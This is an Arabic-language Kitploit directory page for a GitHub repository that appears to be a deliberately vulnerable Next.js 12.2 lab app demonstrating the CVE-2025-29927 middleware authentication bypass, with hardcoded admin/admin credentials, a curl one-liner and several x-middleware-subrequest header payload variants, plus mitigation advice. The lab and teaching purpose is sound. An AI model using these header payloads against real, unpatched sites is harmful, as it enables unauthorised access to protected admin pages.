Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
next-js-auth-bypass — 🔓 عرض توضيحي لتجاوز المصادقة في Next.js - تطبيق تعليمي يوضح ثغرة تجاوز المصادقة في middleware CVE-2025-29927. ⚠️ للاستخدام التعليمي فقط. [تم إنشاؤه باستخدام الذكاء الاصطناعي] | Kitploit
أدوات/GitHubGitHub/kazuya256/next-js-auth-bypass
المصادقة والترخيصتحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubkazuya256/next-js-auth-bypass

next-js-auth-bypass

🔓 عرض توضيحي لتجاوز المصادقة في Next.js - تطبيق تعليمي يوضح ثغرة تجاوز المصادقة في middleware CVE-2025-29927. ⚠️ للاستخدام التعليمي فقط. [تم إنشاؤه باستخدام الذكاء الاصطناعي]

عرض المستودع
13منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مرحبا بالعالم - Next.js 12.2

تطبيق بسيط لإثبات المفهوم باستخدام Next.js 12.2.

🚀 بدء سريع

1. تثبيت التبعيات

root@kitploit:~
npm install

2. تشغيل خادم التطوير

root@kitploit:~
npm run dev

سيكون التطبيق متاحًا على http://localhost:3000

🛠️ البرامج النصية المتاحة

  • npm run dev - تشغيل خادم التطوير
  • npm run build - بناء نسخة الإنتاج
  • npm run start - تشغيل خادم الإنتاج

🎯 الميزات

  • ✅ Next.js 12.2 - أحدث إصدار مستقر
  • ✅ React 18.2 - ميزات React الحديثة
  • ✅ تصميم بسيط - واجهة نظيفة ومتجاوبة
  • ✅ نظام مصادقة - تسجيل الدخول ببيانات اعتماد مضمّنة
  • ✅ لوحة تحكم المشرف - لوحة معلومات محمية تحتوي على بيانات حساسة
  • ✅ برمجية وسيطة ضعيفة - توضح تقنيات تجاوز المصادقة
  • ✅ عرض استغلال - سهولة إعادة إنتاج المشكلات الأمنية

🔧 التخصيص

قم بتعديل pages/index.js لتغيير صفحة مرحبا بالعالم. يستخدم التطبيق أنماطًا مضمّنة للتبسيط، ولكن يمكنك إضافة ملفات CSS أو مكتبات تنسيق حسب الحاجة.

🔓 عرض أمني لـ CVE-2025-29927

يوضح هذا التطبيق ثغرة CVE-2025-29927 التي اكتشفها Rachid.A (zhero) و Yasser Allam (inzo_):

📋 تفاصيل الثغرة

  • CVE: CVE-2025-29927
  • CVSS: 9.1/10 (حرجة)
  • الإصدارات المتأثرة: Next.js 11.1.4 - 15.2.2
  • التأثير: تجاوز كامل للبرمجية الوسيطة باستخدام ترويسة x-middleware-subrequest

🎯 بيانات اعتماد العرض

  • اسم المستخدم: admin
  • كلمة المرور: admin

🚨 طرق استغلال CVE-2025-29927

  1. إضافة متصفح (ModHeader) - أضف الترويسة x-middleware-subrequest: middleware
  2. وحدة تحكم JavaScript - استخدم fetch مع ترويسة التجاوز
  3. استغلال cURL - curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin
  4. Python Requests - أضف الترويسة لتجاوز البرمجية الوسيطة بالكامل

🔧 أشكال الحمولة المختلفة

  • Next.js 12.2+: x-middleware-subrequest: middleware
  • مع دليل /src: x-middleware-subrequest: src/middleware
  • Next.js 15.x: x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

🛡️ التخفيف

  • قم بالتحديث إلى Next.js 15.2.3+ (14.2.25+ للإصدارات 14.x)
  • احظر ترويسة x-middleware-subrequest على مستوى الوكيل/CDN
  • نفّذ تحققًا إضافيًا على جانب الخادم

⚠️ تحذير: هذا يعرض ثغرة CVE حقيقية لأغراض تعليمية فقط!

📦 التبعيات

  • next: 12.2.0
  • react: 18.2.0
  • react-dom: 18.2.0

🎨 التنسيق

يستخدم هذا التطبيق أنماطًا مضمّنة للتبسيط. بالنسبة لتطبيق إنتاجي، فكّر في استخدام:

  • CSS Modules
  • Styled Components
  • Tailwind CSS
  • أو أي حل تنسيق آخر

برمجة سعيدة! 🚀

تنزيل الأداة